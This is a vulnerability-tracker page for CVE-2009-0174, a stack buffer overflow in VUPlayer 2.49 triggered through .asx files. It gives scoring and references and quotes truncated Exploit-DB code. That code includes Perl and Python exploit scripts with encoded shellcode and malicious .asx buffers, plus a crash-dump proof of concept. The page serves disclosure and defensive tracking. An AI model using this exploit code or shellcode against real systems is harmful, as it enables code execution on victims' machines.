CVE-2009-0174
published 2009-01-20CVE-2009-0174: Stack-based buffer overflow in VUPlayer 2.49 allows remote attackers to execute arbitrary code via a long .asf URI in the HREF attribute of a REF element in a…
PriorityP346critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
11.68%
95.5th percentile
Stack-based buffer overflow in VUPlayer 2.49 allows remote attackers to execute arbitrary code via a long .asf URI in the HREF attribute of a REF element in a .asx file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vuplayer | vuplayer | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (1)
exploitdb·2009-01-11
CVE-2009-0174 VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (1)
VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (1)
---
#!/usr/bin/perl
intro();
#does not need a thread method shellcode to run as best as can. seh work great too!
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x30\x42\x30\x42\x50\x4b\x58\x45\x54\x4e\x43\x4b\x48\x4e\x37".
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48".
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\
Exploit-DB
VUPlayer 2.49 - '.asx' 'HREF' Universal Buffer Overflow
exploitdb·2009-01-11
CVE-2009-0174 VUPlayer 2.49 - '.asx' 'HREF' Universal Buffer Overflow
VUPlayer 2.49 - '.asx' 'HREF' Universal Buffer Overflow
---
#usage: exploit.py
print "**************************************************************************"
print " VUPlayer 2.49 .ASX File (HREF) Universal Buffer Overflow\n"
print " Founder: aBo MoHaMeD"
print " exploit code: His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
header1 = (
"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33"
"\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54"
"\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54"
"\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46"
"\x3D\x22"
)
header2 = (
"\x2E\x61\x73\x66\x22
Exploit-DB
VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (2)
exploitdb·2009-01-09
CVE-2009-0174 VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (2)
VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (2)
---
#!/usr/bin/perl -w
# author : Houssamix
# VUPlayer 2.49 (.asx File) local Stack Overflow Exploit
print "
########################################################################
#~ Author : HouSSamix #
#~ Program : VUPlayer #
#~ Version : 2.49 #
#~ website : http://www.vuplayer.com/ #
#~ Download : http://vuplayer.com/files/vuplayersetup.exe #
#~ Type : (.asx File) local Stack Overflow Exploit #
########################################################################\n";
###################################################################
$BOF =
"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33\x2E".
"\x30\x22\x3E\x0A\x0D\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x0A\x3C\x54".
"\x49\x54\x4C\x45\x3E\x50\x72\x4F\x20\x53\x70\x59
Exploit-DB
VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (PoC)
exploitdb·2009-01-09
CVE-2009-0174 VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (PoC)
VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (PoC)
---
#!/usr/bin/perl -w
print "
########################################################################
#~ Program : VUPlayer #
#~ Version : 2.49 #
#~ website : http://www.vuplayer.com/ #
#~ Download : http://vuplayer.com/files/vuplayersetup.exe #
#~ Type : (.asx File) local Stack Overflow PoC #
########################################################################\n";
print "
EAX 00000000
ECX 43434343
EDX 00C181A0
EBX 00000001
ESP 0012EACC ASCII AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 424E704F
ESI 0050B460 VUPlayer.0050B460
EDI 0012ED
No writeups or analysis indexed.
http://securityreason.com/securityalert/4918http://www.securityfocus.com/bid/33185https://exchange.xforce.ibmcloud.com/vulnerabilities/47851https://www.exploit-db.com/exploits/7709https://www.exploit-db.com/exploits/7713https://www.exploit-db.com/exploits/7714https://www.exploit-db.com/exploits/7715http://securityreason.com/securityalert/4918http://www.securityfocus.com/bid/33185https://exchange.xforce.ibmcloud.com/vulnerabilities/47851https://www.exploit-db.com/exploits/7709https://www.exploit-db.com/exploits/7713https://www.exploit-db.com/exploits/7714https://www.exploit-db.com/exploits/7715
2009-01-20
Published